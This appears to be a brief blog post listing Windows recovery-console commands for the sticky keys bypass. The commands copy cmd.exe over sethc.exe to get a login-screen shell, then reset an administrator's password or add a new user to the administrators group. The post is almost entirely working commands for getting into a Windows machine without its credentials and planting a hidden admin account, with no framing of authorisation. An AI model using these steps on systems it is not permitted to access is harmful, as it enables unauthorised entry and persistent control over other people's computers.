Commands
-Replacing sticky keys-
x:\Sources>diskpart
DISKPART>list vol
DISKPART>exit
x:\Sources>copy c:\windows\system32\sethc.exe c:\
x:\Sources>copy c:\windows\system32\cmd.exe c:windows\system32\sethc.exe
x:\Sources>exit
-Destructive method.-
x:\Sources>net user Admin ("admin lee") *
-Non Destructive method-
x:\Sources>net user mrlee /add
x:\Sources>net localgroup administrators mrlee /add
No comments:
Post a Comment